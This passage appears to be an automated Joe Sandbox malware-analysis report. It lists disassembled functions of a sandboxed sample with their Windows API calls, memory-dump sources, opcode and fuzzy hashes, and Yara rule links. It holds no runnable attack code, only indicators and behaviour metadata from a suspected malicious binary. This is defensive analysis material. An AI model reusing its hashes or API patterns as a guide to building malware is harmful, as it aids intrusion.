                            • GetCursorPos.USER32(?), ref: 003FB605
                            • ScreenToClient.USER32(?,?), ref: 003FB610
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Client$CursorLongProcRectScreenWindow
                            • String ID:
                            • API String ID: 4127811313-0
                            • Opcode ID: 95729ee623f1156c26739590486249e073e20bb0df53736e3278970f7c52b870
                            • Instruction ID: 1d676ed6f39eea9363399274c6189a12bc82a3c00c8e97958e15ebe7a9d9e7a2
                            • Opcode Fuzzy Hash: 95729ee623f1156c26739590486249e073e20bb0df53736e3278970f7c52b870
                            • Instruction Fuzzy Hash: C8112839500419FBDB11EF98D885EAEB7B8EB06301F40086AF901E7142C731AE569BA9
                            Function 0041D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0041D84D
                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0041D864
                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0041D879
                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0041D897
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Type$Register$FileLoadModuleNameUser
                            • String ID:
                            • API String ID: 1352324309-0
                            • Opcode ID: db2fd515e8cacbe6c7b19fb5e1d41697c033b5e1e7f10c505d483885f218ea67
                            • Instruction ID: 5037eab77199061402025e5b9a04bb89c190f1c4d7ebd8f923cca09e6e7c24ac
                            • Opcode Fuzzy Hash: db2fd515e8cacbe6c7b19fb5e1d41697c033b5e1e7f10c505d483885f218ea67
                            • Instruction Fuzzy Hash: 91115EB5A05304DBE3209F50DC08FD3BBBCEF00B10F10856AE926D6150D7B4EA899BA9
                            Function 003F6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: a16050faba35dd88affe787b56414bd53bf1af4eaf18035821ca7904362c3396
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: E3014B7244814EBBCF175E84DC01CEE3F66BF28355B598415FB1898131D636C9B1AB81
                            Function 0044B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 0044B2E4
                            • ScreenToClient.USER32(?,?), ref: 0044B2FC
                            • ScreenToClient.USER32(?,?), ref: 0044B320
                            • InvalidateRect.USER32(?,?,?), ref: 0044B33B
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClientRectScreen$InvalidateWindow
                            • String ID:
                            • API String ID: 357397906-0
                            • Opcode ID: 3f337986683a7dcaa78b05d342847bae016cf8952593762fdba884292c28d412
                            • Instruction ID: f8922a781ab99b73f9960bbc4548d1b7e155266756505a8e6ffff2411a3b0825
                            • Opcode Fuzzy Hash: 3f337986683a7dcaa78b05d342847bae016cf8952593762fdba884292c28d412
                            • Instruction Fuzzy Hash: 57117779D00209EFDB01CF99C444AEEBBF5FF09310F104166E914E3220D735AA658F94
                            Function 00426BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 00426BE6
                              • Part of subcall function 004276C4: _memset.LIBCMT ref: 004276F9
                            • _memmove.LIBCMT ref: 00426C09
                            • _memset.LIBCMT ref: 00426C16
                            • LeaveCriticalSection.KERNEL32(?), ref: 00426C26
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CriticalSection_memset$EnterLeave_memmove
                            • String ID:
                            • API String ID: 48991266-0
                            • Opcode ID: baef6811a6a15d1b626869dda4289eddb6a1827de6e67bda3d6aa76aecbbc722
                            • Instruction ID: e0d2e36fe0992efdc642bd2d9707efff123d922214500572b976d824c966835a
                            • Opcode Fuzzy Hash: baef6811a6a15d1b626869dda4289eddb6a1827de6e67bda3d6aa76aecbbc722
                            • Instruction Fuzzy Hash: 48F0543A200110ABCF016F56EC85A4ABF29EF45324F0480A5FE085F267C775E811CBB8
                            Function 003C2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000008,00000000), ref: 003C2231
                            • SetTextColor.GDI32(?,000000FF), ref: 003C223B
                            • SetBkMode.GDI32(?,00000001), ref: 003C2250
                            • GetStockObject.GDI32(00000005), ref: 003C2258
                            • GetWindowDC.USER32(?), ref: 003FBE83
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 003FBE90
                            • GetPixel.GDI32(00000000,?,00000000), ref: 003FBEA9
                            • GetPixel.GDI32(00000000,00000000,?), ref: 003FBEC2
                            • GetPixel.GDI32(00000000,?,?), ref: 003FBEE2
                            • ReleaseDC.USER32(?,00000000), ref: 003FBEED
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                            • String ID:
                            • API String ID: 1946975507-0
                            • Opcode ID: 6a838d3dcae70ef49cc68dd06cf4bb1032fe4b571c585659018d07fba148d8ea
                            • Instruction ID: 85ec5e45115bfb695fceaa7c4a5c2bd31314713a83a3313ba3c034d42973f9dd
                            • Opcode Fuzzy Hash: 6a838d3dcae70ef49cc68dd06cf4bb1032fe4b571c585659018d07fba148d8ea
                            • Instruction Fuzzy Hash: 2FE03936104244EAEB225FA4FC0DBE87B10EB16332F018376FA69980E1C7B14984DB12
                            Function 00418712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00418195,?,?,?,004182E6), ref: 0041871B
                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,004182E6), ref: 00418722
                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004182E6), ref: 0041872F
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,004182E6), ref: 00418736
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CurrentOpenProcessThreadToken
                            • String ID:
                            • API String ID: 3974789173-0
                            • Opcode ID: ed4374ba9a7d12fce2766ccacccef38ac854a5555b3f6bb0f18524be15c86c33
                            • Instruction ID: 6bfc54a6ef2691fa078b911f4cdf84457ca74c53899f70a598bca0a84a526e08
                            • Opcode Fuzzy Hash: ed4374ba9a7d12fce2766ccacccef38ac854a5555b3f6bb0f18524be15c86c33
                            • Instruction Fuzzy Hash: 52E0863A6112119BD7205FB09D0CB973BACEF52791F144838B645C9080DA388489C754
                            Function 003C6240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: %E
                            • API String ID: 0-175436132
                            • Opcode ID: adb9520cceef83a0221b03e8691c44c3712247d6a3da29f63d01b8d30c313ebf
                            • Instruction ID: 4b876a099d83add84ed0b6ce12874f5f7aee1a4a174cdfff6a0118266a629aae
                            • Opcode Fuzzy Hash: adb9520cceef83a0221b03e8691c44c3712247d6a3da29f63d01b8d30c313ebf
                            • Instruction Fuzzy Hash: 26B17E759002099BCF16EB94C886FFEB7B9EF44310F10452EE912EB1A1DB349E85CB91
                            Function 0043AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __itow_s
                            • String ID: xbH$xbH
                            • API String ID: 3653519197-891960813
                            • Opcode ID: 453e9a93cbe7b78753b9aba5f42afe03c4af8a51de2882a2f9dfe35d514bf05e
                            • Instruction ID: 9e29e2946772ca66017da0fb01112c295d13196bbee3e023db54f620c24f21ce
                            • Opcode Fuzzy Hash: 453e9a93cbe7b78753b9aba5f42afe03c4af8a51de2882a2f9dfe35d514bf05e
                            • Instruction Fuzzy Hash: DDB17D70A00109EBCF14EF54C891EAABBB9FF58340F14955AFA45DB291EB34ED41CBA4
                            Function 0042AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003DFC86: _wcscpy.LIBCMT ref: 003DFCA9
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • __wcsnicmp.LIBCMT ref: 0042B02D
                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0042B0F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                            • String ID: LPT
                            • API String ID: 3222508074-1350329615
                            • Opcode ID: 85ae1c239e1e4f19d6aac420a05a0f75474f9f0e74e5dbc5f3e032662d8e643d
                            • Instruction ID: 70db304cefcd3e1d05daa39168cbcd78abb205c71d1847ad190b508ad6fe4932
                            • Opcode Fuzzy Hash: 85ae1c239e1e4f19d6aac420a05a0f75474f9f0e74e5dbc5f3e032662d8e643d
                            • Instruction Fuzzy Hash: 4061C071A00224AFCB05DF94D895EBFB7B4EF08300F51406AF916AB391DB74AE80CB95
                            Function 003D2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 003D2968
                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 003D2981
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            • Opcode ID: 2033e406924adc7c9c20d8f7957988f305ad856e21bc2a93f47112d3523e8f35
                            • Instruction ID: 41ffdf7f3883845217d6abb50c7bfa279953103160cb3737b935624d114a8751
                            • Opcode Fuzzy Hash: 2033e406924adc7c9c20d8f7957988f305ad856e21bc2a93f47112d3523e8f35
                            • Instruction Fuzzy Hash: 74514A714087449BD721EF20D885BAFB7E8FF85344F42485DF1D8861A1EB71892DCB56
                            Function 00429734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C4F0B: __fread_nolock.LIBCMT ref: 003C4F29
                            • _wcscmp.LIBCMT ref: 00429824
                            • _wcscmp.LIBCMT ref: 00429837
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcscmp$__fread_nolock
                            • String ID: FILE
                            • API String ID: 4029003684-3121273764
                            • Opcode ID: 8748232acb66b90e7a87881eff24f71229ce599a7289a15d20035af647918d78
                            • Instruction ID: 3631d8495ad495a7ac6cf1f9c0b99d0982f1f173aa9af4980941d9a5a3c09d18
                            • Opcode Fuzzy Hash: 8748232acb66b90e7a87881eff24f71229ce599a7289a15d20035af647918d78
                            • Instruction Fuzzy Hash: B941E971A00219BADF21AAA1DC45FEFBBBDEF85710F40006EF904EB280DA759D04CB65
                            Function 00400574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID: DdH$DdH
                            • API String ID: 1473721057-4154174116
                            • Opcode ID: ab28dd06b3e62dbb1c8b020664341438f22c094f604dc42897f39afc9220730b
                            • Instruction ID: 80627b1f5ad237a25d5e78f1dea58bd020a3dde0530e4d6e8472b430eaaa7b5d
                            • Opcode Fuzzy Hash: ab28dd06b3e62dbb1c8b020664341438f22c094f604dc42897f39afc9220730b
                            • Instruction Fuzzy Hash: 345120B86087058FD795DF18C480B1ABBF1BB88758F55886DE885CB361D331EC81CB46
                            Function 0043258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0043259E
                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004325D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CrackInternet_memset
                            • String ID: |
                            • API String ID: 1413715105-2343686810
                            • Opcode ID: 652ea63232cbe3d6649acef57b6693904a41b941fab6cbebc2e3e402773630ea
                            • Instruction ID: ba37cdac2c5ac6b0a57dba43a1e6e440f4b8617cff82a228f12f16cd0035754b
                            • Opcode Fuzzy Hash: 652ea63232cbe3d6649acef57b6693904a41b941fab6cbebc2e3e402773630ea
                            • Instruction Fuzzy Hash: 0531F871800119ABCF01AFA1CD86EEEBFB8FF08310F10105AED55AA162DB755956DF60
                            Function 00446A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32 ref: 00446B17
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00446B53
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$DestroyMove
                            • String ID: static
                            • API String ID: 2139405536-2160076837
                            • Opcode ID: 65ec6c7ef1e45c4f3a31b1b0a1b420342c2d88b04c7c1c2f9055fd4904d1ac53
                            • Instruction ID: 2078b19ff92134261e957592d3f99a0e04d595e916124c5842d08ed520653ecd
                            • Opcode Fuzzy Hash: 65ec6c7ef1e45c4f3a31b1b0a1b420342c2d88b04c7c1c2f9055fd4904d1ac53
                            • Instruction Fuzzy Hash: C4319071200604AEEB109F64CC40FFB73A9FF49764F11852EF9A5D7190DA34AC91CB65
                            Function 004228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: c9f01caf883fe3be389c9ccdd47e44bc5164d9cb25a39a5b696800e84677ebb1
                            • Instruction ID: 11ae69f1ccf102ddd889a1f6a16cb866fabbec909fb52f0f086d5a9ee88760ab
                            • Opcode Fuzzy Hash: c9f01caf883fe3be389c9ccdd47e44bc5164d9cb25a39a5b696800e84677ebb1
                            • Instruction Fuzzy Hash: 5631FC71700325BBDB25DF44EE457AFBBB4EF45350F54001AED81962A0D7B49980CB19
                            Function 003C16DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • GetParent.USER32(?), ref: 003FB7BA
                            • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,003C19B3,?,?,?,00000006,?), ref: 003FB834
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LongWindow$ParentProc
                            • String ID: `$
                            • API String ID: 2181805148-74666722
                            • Opcode ID: c7597651cf3ecc5f820fcf42f1f65186228d545b25064b3e25ada92743d617ab
                            • Instruction ID: b175d89ed35db2f26ca6d2b31e7b96005f5cc4a2eeafa860c3c336286724e6a9
                            • Opcode Fuzzy Hash: c7597651cf3ecc5f820fcf42f1f65186228d545b25064b3e25ada92743d617ab
                            • Instruction Fuzzy Hash: A221EC38201508AFCB129F28C984FB93BD6EF4B320F594269F5259B2F2C7315D11EB54
                            Function 004466D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00446761
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0044676C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            • Opcode ID: 94b203dfb10a645636bc514227f853d36ab9340805d071318d2dce5a4b33f700
                            • Instruction ID: 4161b4e1d548426df3710bb9c427382eb21293e9e230694a25b4724675c73e4c
                            • Opcode Fuzzy Hash: 94b203dfb10a645636bc514227f853d36ab9340805d071318d2dce5a4b33f700
